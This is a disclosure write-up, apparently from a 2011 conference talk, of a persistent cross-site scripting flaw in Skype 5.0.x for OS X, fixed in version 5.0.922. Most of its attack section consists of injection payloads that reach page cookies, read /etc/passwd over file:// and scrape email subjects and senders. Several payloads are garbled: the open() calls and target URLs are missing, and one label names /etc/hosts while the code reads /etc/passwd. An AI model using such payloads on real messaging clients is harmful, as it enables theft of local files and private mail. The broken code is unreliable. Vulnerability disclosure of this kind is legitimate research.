This exploit was used as an example to my talk at Toorcon Seattle 2011.
XSS Without a BrowserWait, what?

Vulnerability: Cross Site Scripting

Affects: Skype 5.0.x to <= 5.0.914 (OS X) (Download | Local Mirror)

Skype ( was vulnerable to (persistent?) XSS via messages from other users.

On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.

Update: After a friend went over the documentation that hooks webkit into applications, he found this snippet. I was wrong in saying there was a null origin, it's just expicitly set to allow * :


Once you have obtained the Window object for the target document, you can send it a message with the following code:

windowObj.postMessage('test message', '');

The first parameter is an arbitrary message.

The second parameter is the target origin value. An origin value is just a URL with the path part removed.
For example, the origin of a local file isfile://. By specifying a target origin, you are saying that that 
your message should only be delivered if the target window's current contents came from that origin.

Although you may specify an asterisk (*) wildcard for the target origin (to allow the message to be sent
regardless of where the contents of the target window came from), you should do so only if you are certain that
it would not be harmful if your message were received by content originating from a different website.


Authentication Status: Logged into skype, but persists in logs, so a user can be exploited again if viewing logs. Default privacy settings require a user to add the attacker as a contact.


Inject used in attack"><script>alert(1)</script>

More advanced attacks:

Create an iFrame to within the Skype chat DOM. Write to that iFrame's DOM."><script>try{alert(document.getElementsByClassName("body")[0].innerHTML="<div\40style='height:200px;'><iframe\40src=''\40onload='hax.document.body.innerHTML=\42<img\40src=z\40onerror=\\\42alert(document.domain+document.cookie)\\\42>\42'\40id='hax'></iframe><div>")}catch(e){alert(e)}</script>

Create an XHR request to pull /etc/hosts"><script>x=new/**/XMLHttpRequest;'get','file:///etc/passwd');x.send();x.onreadystatechange=function(){if(x.readyState==4)alert(x.responseText)}</script>

Create an XHR request to pull mobile, then run regex on the page & pull out email titles & from. (Terrible terrible regex.)"><script>var/**/list='';var/**/winning='';x=new/**/XMLHttpRequest();'get','');x.send();x.onreadystatechange=function(){if(x.readyState==4){list=x.responseText.match(/<div.class=.msgrd.>\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n<\/div>/g);for(i/**/in/**/list){winning=winning+list[i].match(/msgrd.>\n(.*)\n<br..>/)[1]+"\40||\40"+list[i].match(/[a-z0-9]{13}.>\n(.*)<\/a>/)[1]+'\n';}alert(winning)}}</script>


May 6th, 2011 - Skype fixed this in their 5.0.922 update. (Released April 14th, 2011)